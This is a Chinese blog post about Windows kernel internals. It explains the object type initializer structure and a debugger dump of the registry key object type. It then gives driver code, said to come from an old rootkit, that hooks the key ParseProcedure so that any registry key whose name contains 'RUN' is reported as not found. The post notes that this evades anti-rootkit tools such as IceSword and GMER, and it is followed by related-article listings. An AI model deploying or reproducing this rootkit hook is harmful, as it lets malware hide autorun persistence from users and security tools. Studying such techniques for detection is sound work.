ObjectType HOOK干涉注册表操作

最新推荐文章于 2023-06-11 20:41:35 发布
最新推荐文章于 2023-06-11 20:41:35 发布
阅读量683 收藏
点赞数
分类专栏: 驱动开发学习 文章标签: hook object null header 工具 query
来看ObOpenObjectByName,它会调用ObpLookupObjectByName来打开一个对象。

  对象头(object_header)有一个object type结构,object type结构里有一个TypeInfo,结构是OBJECT_TYPE_INITIALIZER

   typedefstruct_OBJECT_TYPE_INITIALIZER{
  USHORTLength;
  BOOLEANUseDefaultObject;
  BOOLEANCaseInsensitive;
  ULONGInvalidAttributes;
  GENERIC_MAPPINGGenericMapping;
  ULONGValidAccessMask;
  BOOLEANSecurityRequired;
  BOOLEANMaintainHandleCount;
  BOOLEANMaintainTypeList;
  POOL_TYPEPoolType;
  ULONGDefaultPagedPoolCharge;
  ULONGDefaultNonPagedPoolCharge;
  PVOIDDumpProcedure;
  PVOIDOpenProcedure;
  PVOIDCloseProcedure;
  PVOIDDeleteProcedure;
  PVOIDParseProcedure;
  PVOIDSecurityProcedure;
  PVOIDQueryNameProcedure;
  PVOIDOkayToCloseProcedure;
  }OBJECT_TYPE_INITIALIZER,*POBJECT_TYPE_INITIALIZER;

  OBJECT_TYPE_INITIALIZER 结构中一个指针ParseProcedure就是用来实现这类对象的打开的

  OBJECT_TYPE_INITIALIZER 中类似的有:

DumpProcedure;OpenProcedure;CloseProcedure;DeleteProcedure;ParseProcedure;SecurityProcedure;QueryNameProcedure;OkayToCloseProcedure;

  分别对应着对象的删除、lookup、获取名字等的例程,一般对象不是所有的routine都有。

  这些都是在ObCreateObjectType(系统启动时)填充的。

  例如KeyObject的TypeInfo:

    lkd>dt_OBJECT_TYPE_INITIALIZER839b25e0+60
  +0x000Length:0x4c
  +0x002UseDefaultObject:0x1''
  +0x003CaseInsensitive:0''
  +0x004InvalidAttributes:0x30
  +0x008GenericMapping:_GENERIC_MAPPING
  +0x018ValidAccessMask:0x1f003f
  +0x01cSecurityRequired:0x1''
  +0x01dMaintainHandleCount:0''
  +0x01eMaintainTypeList:0x1''
  +0x020PoolType:1(PagedPool)
  +0x024DefaultPagedPoolCharge:0x74
  +0x028DefaultNonPagedPoolCharge:0
  +0x02cDumpProcedure:(null)
  +0x030OpenProcedure:(null)
  +0x034CloseProcedure:0x8062cedcnt!CmpCloseKeyObject+0
  +0x038DeleteProcedure:0x8062cdc2nt!CmpDeleteKeyObject+0
  +0x03cParseProcedure:0x806250c2nt!CmpParseKey+0
  +0x040SecurityProcedure:0x8062cc24nt!CmpSecurityMethod+0
  +0x044QueryNameProcedure:0x8062be7ent!CmpQueryKeyName+0
  +0x048OkayToCloseProcedure:(null)

  那么很简单了,我们只要HOOK这些函数例程就可以了。

  例如hook ParseProcedure,那么可以令得无法打开特定的Object

  这些函数例程的原始例程是比较难搜索到的,结合多段跳,可以很容易地让反rootkit工具检查不到这种HOOK。

  HOOK了之后,冰刃(蹦出“无法打开”)和GMER都无法打开目标的注册表键,当然uty的那个新的反ROOTKIT工具也是不行~(直接解析注册表的例如DarkSpy则可以)

  以下是很老的一个RK里的代码,用于进行这个处理,小改了一下:

   PVOIDOldParseKey;
  //安装HOOK
  voidInstallAdvRegHook()
  {
  UNICODE_STRINGRegPath;
  OBJECT_ATTRIBUTESoba;
  HANDLERegKeyHandle;
  NTSTATUSstatus;
  PVOIDKeyObject;
  PMYOBJECT_TYPECmpKeyObjectType;
  RtlInitUnicodeString(&RegPath,L"RegistryMachineSystem");
  InitializeObjectAttributes(&oba,
  &RegPath,
  OBJ_KERNEL_HANDLE|OBJ_CASE_INSENSITIVE,
  0,
  0);
  RegKeyHandle=0;
  status=ZwOpenKey(&RegKeyHandle,KEY_QUERY_VALUE,&oba);
  if(!NT_SUCCESS(status))
  {
  KDMSG(("openthesystemkeyfailed!
"));
  return;
  }
  //首先随便打开一个注册表键,得到对象
  status=ObReferenceObjectByHandle(RegKeyHandle,
  GENERIC_READ,
  NULL,
  KernelMode,
  &KeyObject,
  0);
  if(!NT_SUCCESS(status))
  {
  KDMSG(("referencethekeyobjectfailed!
"));
  ZwClose(RegKeyHandle);
  return;
  }
  __asm
  {
  pusheax
  moveax,KeyObject
  moveax,[eax-0x10]
  movCmpKeyObjectType,eax
  popeax
  }
  KDMSG(("keyobjecttype:%08x
",CmpKeyObjectType));
  //getthekeyobjecttype
  //获得注册表键对象类型,即CmpKeyObjectType
  OldParseKey=CmpKeyObjectType->TypeInfo.ParseProcedure;
  KDMSG(("keyparseProcedureroutine:%08x
",OldParseKey));
  if(!MmIsAddressValid(OldParseKey))
  {
  ObDereferenceObject(KeyObject);
  ZwClose(RegKeyHandle);
  return;
  }
  //保存原始的ParseProcedure
  CmpKeyObjectType->TypeInfo.ParseProcedure=(ULONG)FakeParseKey;
  //进行HOOK
  ObDereferenceObject(KeyObject);
  ZwClose(RegKeyHandle);
  return;
  }
  //HOOK函数
  NTSTATUSFakeParseKey(POBJECT_DIRECTORYRootDirectory,
  POBJECT_TYPEObjectType,
  PACCESS_STATEAccessState,
  KPROCESSOR_MODEAccessCheckMode,
  ULONGAttributes,
  PUNICODE_STRINGObjectName,
  PUNICODE_STRINGRemainingName,
  PVOIDParseContext,
  PSECURITY_QUALITY_OF_SERVICESecurityQos,
  PVOID*Object)
  {
  NTSTATUSstat;
  WCHARName[300];
  RtlCopyMemory(Name,ObjectName->Buffer,ObjectName->MaximumLength);
  _wcsupr(Name);
  if(wcsstr(Name,L"RUN"))
  {
  //检查是不是要保护的注册表键
  returnSTATUS_OBJECT_NAME_NOT_FOUND;
  }
  __asm
  {
  pusheax
  pushObject
  pushSecurityQos
  pushParseContext
  pushRemainingName
  pushObjectName
  pushAttributes
  movzxeax,AccessCheckMode
  pusheax
  pushAccessState
  pushObjectType
  pushRootDirectory
  callOldParseKey
  movstat,eax
  popeax
  }
  returnstat;
  }

cosmoslife
关注
专栏目录
注册表监控软件(hook
05-08
显示每个注册表操作,用到hook,api,dll等方面的技术,对于pe也用到
HOOK注册表.rar
04-05
HOOK注册表.rar
【记录】学习下ObjectTypeHook Check
Returns' Station
05-11 990
看了下sudami那篇文章,记录+膜拜一下~~ 很简单,就是太麻烦,思路还是可以学习下的。之前没想过重定位可以用来找引用=。=||| 一般ObjectTypeHook 关注device driver file process thread job 还有 CmpKey,由于检测这个都是靠特征值匹配的,工作量会很大,其他的先无视了。 device driver process 这类导
HOOK 系统注册表 HOOK API SYSTEM REGISTRY
12-21
HOOK 系统注册表 HOOK API SYSTEM REGISTRY 文件清单: PHookRegistry.exe HOOK管理主程序 PNtHOOK.dll HOOK API DLL 功能描述: 1. 只针对用户级别的程序API陷井式HOOK, 这里只对以下API进行HOOK: RegCloseKey RegDeleteKeyA RegDeleteKeyW RegQueryValueExW RegQueryValueExA RegQueryValueA RegQueryValueW RegOpenKeyExW RegCreateKeyExW RegSetValueExW RegDeleteValueW RegOpenKeyExA RegCreateKeyExA RegSetValueExA RegDeleteValueA 以上API就足以完成注册表数据的截获。 2.如何HOOK程序启动初始化时的API问题? 第一次选中目标程序启动对它的HOOK,然后关闭该程序,不要释放HOOK接着再打开该程序就会进入启动时的HOOK
易语言HOOK注册表
07-21
易语言HOOK注册表源码,HOOK注册表,GetMsgProc,new_RegSetValueEx,HOOKAPI,ReadApi,api_CallNextHookEx,取程序或DLL句柄,取DLL函数地址,返回虚拟信息,修改虚拟保护,写内存字节,取当前进程伪句柄,api_RegSetValueEx,...
HookAPI.rar_Hook Api rmxp_hook a_hook api_好学习Hook_注册表 hook
09-23
"HookAPI.rar_Hook Api rmxp_hook a_hook api_好学习Hook_注册表 hook"这个压缩包似乎包含了一系列关于Hook API的实践教程和示例,特别关注于RMXP(RPG Maker XP)平台,以及注册表相关的Hook应用。 RMXP是一款流行...
objecthook_objecthook_
09-30
在Python编程中,`objecthook`是一个非常关键的概念,特别是在序列化和反序列化操作中。这个概念主要与`json`模块相关,因为当我们使用`json`进行数据转换时,`objecthook`允许我们自定义如何将JSON对象转化为Python...
易语言源码易语言HOOK注册表源码.rar
03-30
2. **注册表API调用**:为了操作注册表,源码中可能会使用到如`RegOpenKeyEx`, `RegQueryValueEx`, `RegSetValueEx`等API函数,这些函数分别用于打开、查询和设置注册表键值。 3. **事件处理**:在HOOK函数内,会...
注册表监控程序 (Hook API) VC 6.0
03-04
注册表监控程序 该程序的作用是记录系统发生的注册表操作,(只记录成功的,忽略失败的) 请使用VC6.0编译,另外需要安装较新的Platform SDK,比如Microsoft Platform SDK for Windows 2003 或 Microsoft Platform SDK for Windows XP SP2 Hook API 采用微软detours静态库 "Hook"目录是hook.dll源码 "RegisterMon"目录是界面程序源码,VC6+MFC+Single Document "bin"目录是生成目录 转帖请保留此文件 作者:毕飞
Hook HvpGetCellMapped干涉注册表操作
08-21 1335
KeyObject的结构KeyObject+0x04为Key Control Block(简称KCB)Key_Control_Block结构在2000,和2000以后版本是变动的XP以XP以后版本下kcB+0x10为HiveHive+0x04为HvGetCellRoutine这是一个指向处理例程的指针所有Cm*Key系列函数都会在函数中调用这个Routine该Routine的原型为HvpGetCe
易语言hook注入java_易语言DLL制作调用及hook-注册表注入
weixin_33835122的博客
03-01 841
1、注册表注入的特性是可以在程序启动的时候注入,注入到其他程序还没有初始化完的的时候执行自己的代码2、通过注册表的方式来实现DLL注入,只需要针对特定的注册表项进行修改即可3、如果被注入的进程是64位进程,则注入的DLL也需要是64位的,同理,注入32位的进程也需要是32位的DLL。4、注入64位系统上的32位进程1) 将被注入的DLL名称填入到AppInit_DLLs注册表项:HKEY_LOCA...
HOOK ObjectType 干涉文件访问
zacklin的专栏
07-24 1164
前几日在网上看到MJ0011大虾写的一篇《ObjectType HOOK干涉注册表操作(bypass icesword,gmer,NIAP,etc.)》的文章,感觉很有兴趣。MJ大虾的文章给出的代码主要是干涉注册表的。而ObjectType 可以干涉的不只是注册表,所以就想到用同样的方法去干涉文件的访问,举一反三嘛。 然后问题就出现了 用Windbg跟了一下,发现在pNewParseP
自己定义Object Type对抗Object Hook
OSReact的专栏
07-12 1751
莫灰灰版主说“Object hook 自己定义Process Type和Thread Type才是王道。 ” 今天咱就来这个。 Windows系统的各种资源以对象(Object)的形式来组织,例如File Object, Driver Object,Device Object等等,但实际上这些所谓的“对象”在系统的对象管理器(Object Manager)看来只是完整对象的一个部分——对象实体
Delphi使用ZwQueryKey根据注册表句柄HKEY获取注册表路径
qq_43179046的博客
08-30 257
Hook注册表读写后,需要根据注册表项名称(注册表路径)做一些判断,但是hook只能拿到注册表句柄HEY,必要根据HEY获取注册路径。ntdll.dll中ZwQueryKey函数可以根据句柄获取一系列注册表信息,其中KeyNameInformation代表注册表项名称的信息。调用过程很简单,32位测试正常,64位下没通过。排查ZwQueryKey函数定义参数是否在64位下大小是否与VS一致,没发现问题。最后检查ZwQueryKey返回结果是80000002,数据对齐错误。转换为Delphi定义。...
Windows驱动开发学习记录-ObjectType HookObjectType结构相关分析
最新发布
时空之中的灵魂
06-11 720
其中用不着EPROCESS的结构,获取这个的地址是为了获取_OBJECT_HEADER的地址,在XP环境的代码中可以用以下来获取到_OBJECT_HEADER地址,因为_OBJECT_HEADER结构中的Body部分就是获取的对应的对象,如EPROCESS。在64位系统上 _OBJECT_HEADER中并没有字段直接包含_OBJECT_TYPE结构,而是一个索引,索引的是一个名叫 ObTypeIndexTable的表,这个表是一个包含所有ObjectType的表结构,详细可见我另一篇文章。
勘误 win7x64下对OpenProcedure的ObjectHook
zhuhuibeishadiao
06-10 2765
那个时候刚接触ObjectHook 我对进程对象下的OpenProcedure进行HOOK 保护程序typedef LONG32 (NEAR CDECL FUNCT_005B_0FC1_OpenProcedure) (enum _OB_OPEN_REASON, CHAR, UINT64 /*struct _EPROCESS**/, UINT64 /*VOID**/, UINT64 /*ULONG
ObjectHeaderObjectTypeObjectHook的学习
weixin_30887919的博客
03-23 532
  0x01 前言   之前研究RootKit技术,发现了对象钩子这个概念,一直不知道是什么,然后在网上搜,最先找到的是sudami的一篇文章,于是跟着大牛的脚步研究,其中也参考<内核情景分析>,这本书真是每次看每次有收获。下面记录一下学习过程。   0x02 OBJECT_HEADER结构   这是对象的数据结构的形态,其中OBJECT_HEADER...
ObjectC Hook函数的实现与实战
yixiangboy的博客
05-21 3749
一、简介在一个类没有实现源码的情况下,如果你要改变一个类的实现方法,你可以选择重继承该类,然后重写方法,或者使用Category类别名暴力抢先的方式。但是这两种方式,都需要我们在使用的时候改变我们的编程方式,或者继承该类,或者需要引入Category。下面推出的一种方式,不需要我们修改我们编写逻辑的代码,就能实现函数的Hook功能,那就是RunTime中的Method Swizzling—交换方法的
object_hook
05-23
`object_hook` 是在 Python 的 `json` 模块中的一个可选参数,它允许我们在将 JSON 数据转换为 Python 对象时对其进行自定义处理。具体来说,`object_hook` 是一个回调函数,它接收一个字典作为参数,返回一个 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值